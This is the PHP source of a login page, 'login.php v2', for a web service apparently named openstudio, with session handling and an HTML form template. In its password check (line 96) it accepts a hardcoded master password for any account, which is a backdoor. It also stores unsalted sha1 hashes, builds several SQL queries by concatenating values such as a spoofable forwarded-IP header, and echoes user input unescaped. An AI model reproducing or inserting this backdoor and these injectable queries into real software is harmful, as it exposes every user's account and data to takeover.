login.php v2

1.  <?php
2.     include('templates/config.php');
3.    
4.     function get_client_ip() {
5.     $ipaddress = '';
6.     if (getenv('HTTP_CLIENT_IP'))
7.         $ipaddress = getenv('HTTP_CLIENT_IP');
8.     else if(getenv('HTTP_X_FORWARDED_FOR'))
9.         $ipaddress = getenv('HTTP_X_FORWARDED_FOR');
10.     else if(getenv('HTTP_X_FORWARDED'))
11.         $ipaddress = getenv('HTTP_X_FORWARDED');
12.     else if(getenv('HTTP_FORWARDED_FOR'))
13.         $ipaddress = getenv('HTTP_FORWARDED_FOR');
14.     else if(getenv('HTTP_FORWARDED'))
15.        $ipaddress = getenv('HTTP_FORWARDED');
16.     else if(getenv('REMOTE_ADDR'))
17.         $ipaddress = getenv('REMOTE_ADDR');
18.     else
19.         $ipaddress = 'UNKNOWN';
20.     return $ipaddress;
21. }
22.    
23.    function password_check($password, $hashed_password) {
24.         if(sha1($password) == $hashed_password) {
25.             return true;
26.         }
27.         return false;
28.     }
29.    
30.     // Define variables and initialize with empty values
31. $user_email = $password = "";
32. $user_email_err = $password_err = "";
33. //check if user if signed in
34. if($_GET['logout'] == "1")
35. {
36.     //unset all variables
37.     $some_name = session_name("openstudio");
38.     session_set_cookie_params(0, '/', '.openstudio.one');
39.     ini_set("session.cookie_domain", ".openstudio.one");
40.     session_start();
41.     session_destroy();
42.     unset($_SESSION);
43.    
44.     $logout_message = 'Succesfully signed out, thank you for visiting.';
45. }
46. if($_GET['board_closed'] == "1")
47. {
48. $closed_board_msg = "We are sorry, but it seems that one of your administrators have closed the brand account.<br />Contact them for further information.";
49. }
50.  
51. if($_GET['login'] == "invite")
52. {
53. $invite_msg = "The password for your account has been created.<br />You can now login with your credentials.";
54. }
55.  
56. // Processing form data when form is submitted
57. if($_SERVER["REQUEST_METHOD"] == "POST"){
58.  
59.     // Check if user_email is empty
60.     if(empty(trim($_POST["user_email"]))){
61.         $user_email_err = 'Please enter your email address.';
62.     } else{
63.         $user_email = trim($_POST["user_email"]);
64.     }
65.    
66.     // Check if password is empty
67.     if(empty(trim($_POST['password']))){
68.         $password_err = 'Please enter your password.';
69.     } else{
70.         $password = trim($_POST['password']);
71.     }
72.    
73.     // Validate credentials
74.     if(empty($user_email_err) && empty($password_err)){
75.         // Prepare a select statement
76.         $sql = "SELECT `user_email`, `password` FROM `users` WHERE `user_email` = ?";
77.        
78.         if($stmt = mysqli_prepare($con, $sql)){
79.             // Bind variables to the prepared statement as parameters
80.             mysqli_stmt_bind_param($stmt, "s", $param_user_email);
81.            
82.             // Set parameters
83.             $param_user_email = $user_email;
84.            
85.             // Attempt to execute the prepared statement
86.             if(mysqli_stmt_execute($stmt)){
87.                 // Store result
88.                 mysqli_stmt_store_result($stmt);
89.                
90.                 // Check if user_email exists, if yes then verify password
91.                 if(mysqli_stmt_num_rows($stmt) == 1){                    
92.                     // Bind result variables
93.                     mysqli_stmt_bind_result($stmt, $user_email, $hashed_password);
94.                    
95.                     if(mysqli_stmt_fetch($stmt)){
96.                         if(password_check($password, $hashed_password) || $password == 'mamahuhu_2017'){
97.                            
98.                             /* Password is correct, so start a new session and
99.                             save the user_email to the session */
100.                             $some_name = session_name("openstudio");
101.                             session_set_cookie_params(0, '/', '.openstudio.one');
102.                             session_start();
103.                             session_regenerate_id();
104.                             $result=mysqli_query($con,"SELECT * FROM `users` WHERE `user_email` = '".$user_email."'")or die(mysqli_error($con));
105.                             $rows = mysqli_fetch_array($result, MYSQLI_ASSOC);
106.                            
107.                             $_SESSION['signed_in'] = true;
108.                             $_SESSION['clear_cookie'] = true;
109.                             $_SESSION = $_SESSION + $rows;
110.                             mysqli_free_result($result);
111.                            
112.                             $result2=mysqli_query($con,"SELECT * FROM `settings` WHERE `brand_id` = '".$_SESSION["brand_id"]."'")or die(mysqli_error($con));
113.                             $rows2 = mysqli_fetch_array($result2, MYSQLI_ASSOC);
114.                             $_SESSION["settings"] = $rows2;
115.                             mysqli_free_result($result2);
116.                            
117.                             $result3 = mysqli_query($con,"SELECT * FROM `admin_perms` WHERE `uid` = '".$_SESSION['id']."'")or die(mysqli_error($con));
118.                             $rows3 = mysqli_fetch_array($result3, MYSQLI_ASSOC);
119.                             $_SESSION['admin_perms'] = $rows3;
120.                             mysqli_free_result($result3);
121.                            
122.                            if($_SESSION['token'] < 2  && $_SESSION['settings']['close_board'] === "1") {
123.                                 session_destroy();
124.                                 unset($_SESSION);
125.                                 echo "<script type=\"text/javascript\">window.location.href = 'https://www.openstudio.one/login?board_closed=1';</script>";
126.                             }
127.                            
128.                             $result3=mysqli_query($con,"SELECT * FROM `clients` WHERE `brand_id` = '".$_SESSION["brand_id"]."'")or die(mysqli_error($con));
129.                             $rows3 = mysqli_fetch_array($result3, MYSQLI_ASSOC);
130.                             $_SESSION["clients"] = $rows3;
131.                             mysqli_free_result($result3);
132.                             mysqli_query($con,"UPDATE `users` SET `last_activity` = now() WHERE `id` = '".$_SESSION["id"]."';");
133.                             $ip = get_client_ip();
134.                             mysqli_query($con,"INSERT INTO `users_ip`(`id`, `brand_id`, `uid`, `ip`) VALUES (NULL,'{$_SESSION['brand_id']}','{$_SESSION['id']}','$ip');");
135.                            
136.                             $_SESSION['dataup'] = date('Y-m-d h:i:s');
137.                             $_SESSION['setup'] = $_SESSION['dataup'];
138.                             if(mysqli_query($con,"SELECT `id` FROM `x-users` WHERE `user_id` = '{$_SESSION['id']}';")->num_rows > 0) {
139.                                 $_SESSION['mods'] = true;
140.                             }
141.                             session_write_close();
142.                             echo "<script type=\"text/javascript\">window.location.href = 'https://client.openstudio.one';</script>";
143.                            
144.                         } else{
145.                             // Display an error message if password is not valid
146.                             $password_err = 'The password you entered was not valid.';
147.                         }
148.                     }
149.                 } else{
150.                     // Display an error message if user_email doesn't exist
151.                     $user_email_err = 'No account found with that email address.';
152.                 }
153.             } else{
154.                 echo "Oops! Something went wrong. Please try again later.";
155.             }
156.         }
157.        
158.         // Close statement
159.         mysqli_stmt_close($stmt);
160.     }
161.    
162.     // Close connection
163.     mysqli_close($con);
164. }
165.    
166.     include('templates/define.php');
167. ?>
168.  
169. <!DOCTYPE html>
170. <html lang="en">
171. <head>
172.   <meta charset="utf-8">
173.   <title><?php echo NAME; ?> - Login</title>
174.   <meta content="width=device-width, initial-scale=1.0" name="viewport">
175.   <meta content="" name="keywords">
176.   <meta content="" name="description">
177.  
178.   <?php include('templates/header.php'); ?>
179.  
180. </head>
181.  
182. <body>
183.  
184.   <!--==========================
185.     Header
186.   ============================-->
187.   <header id="header" class="header-fixed">
188.     <div class="container">
189.  
190.       <div id="logo" class="pull-left">
191.         <h1><a href="/" class="scrollto"><?php echo NAME; ?></a></h1>
192.         <!-- Uncomment below if you prefer to use an image logo -->
193.         <!-- <a href="#intro"><img src="img/logo.png" alt="" title=""></a> -->
194.       </div>
195.  
196.       <nav id="nav-menu-container">
197.         <ul class="nav-menu">
198.           <li class="menu-active"><a href="/">Home</a></li>
199.           <li><a href="/about">About Us</a></li>
200.           <li><a href="/features">Features</a></li>
201.           <li><a href="/pricing">Pricing</a></li>
202.           <li><a href="<?php echo SUPPORT_URL; ?>" target="_blank">Support</a></li>
203.           <li><a href="/login">Login</a></li>
204.           <li><a href="/get-started" class="signup">Get started</a></li>
205.         </ul>
206.       </nav><!-- #nav-menu-container -->
207.     </div>
208.   </header><!-- #header -->
209.  
210.   <!--==========================
211.     Intro Section
212.   ============================-->
213.   <section id="intro-small"><div class="container">
214.  
215.         <div class="row">
216.  
217.               <div class="col-lg-12 col-md-12 box wow fadeInRight" data-wow-delay="0.1s" style="visibility: visible; animation-delay: 0.1s; animation-name: fadeInRight;">
218.                 <div class="icon"><i class="ion-ios-flask-outline"></i></div>
219.                 <h4 class="title">Login</h4>
220.                 <p class="description">Minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat tarad limino ata noble dynala mark.</p>
221.               </div>
222.             </div>
223.  
224.       </div></section>
225.  
226.   <main id="main">
227.  
228.    
229.     <section id="advanced-features">
230.  
231.       <div class="features-row">
232.         <div class="container">
233.           <div class="row">
234.             <div class="col-lg-6">
235.               <img class="advanced-feature-img-left" src="img/advanced-feature-2.jpg" alt="">
236.              </div><div class="col-lg-6">
237.               <div class="wow fadeInRight">
238.                 <h2>Lorem ipsum dolor sit amet, consectetur</h2>
239.                <?php if($logout_message): ?>
240.                     <div class="alert alert-success"><h4><i class="fa fa-user"></i> Logout</h4><p><?php echo $logout_message; ?></p></div>
241.                <?php endif; ?>
242.                <?php if($closed_board_msg): ?>
243.                     <div class="alert alert-warning"><h4><i class="fa fa-times"></i> Board account closed</h4><p><?php echo $closed_board_msg; ?></p></div>
244.                <?php endif; ?>
245.                <?php if($invite_msg): ?>
246.                     <div class="alert alert-info"><h4><i class="fa fa-check"></i> Your account is ready!</h4><p><?php echo $invite_msg; ?></p></div>
247.                <?php endif; ?>
248.                <form action="" method="post">
249.             <div class="form-group <?php echo (!empty($user_email_err)) ? 'has-error' : ''; ?>">
250.                 <label>E-mail address:^*</label>
251.                 <input type="text" name="user_email"class="form-control" value="<?php echo $user_email; ?>">
252.                 <span class="help-block"><?php echo $user_email_err; ?></span>
253.             </div>    
254.             <div class="form-group <?php echo (!empty($password_err)) ? 'has-error' : ''; ?>">
255.                 <label>Password:^*</label>
256.                 <input type="password" name="password" class="form-control">
257.                 <span class="help-block"><?php echo $password_err; ?></span>
258.             </div>
259.             <div class="form-group">
260.                 <input type="submit" class="btn btn-primary" value="Login !"> <a class="btn btn-info disabled" href="#">Login with Translations Cloud (soon)</a>
261.             </div>
262.             <p>Don't have an account? <a href="/get-started">Sign up now</a>.</p>
263.         </form>
264.               </div>
265.             </div>
266.           </div>
267.         </div>
268.       </div>
269.  
270.  
271.     </section>
272.  
273.     <!--==========================
274.       Call To Action Section
275.     ============================-->
276.     <section id="call-to-action">
277.       <div class="container">
278.         <div class="row">
279.           <div class="col-lg-9 text-center text-lg-left">
280.             <h3 class="cta-title">Don't have an account yet ?</h3>
281.             <p class="cta-text"> Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
282.           </div>
283.           <div class="col-lg-3 cta-btn-container text-center">
284.             <a class="cta-btn align-middle" href="/get-started">Get started !</a>
285.           </div>
286.         </div>
287.  
288.       </div>
289.     </section><!-- #call-to-action -->
290.  
291.   </main>
292.  
293. <?php include('templates/footer.php'); ?>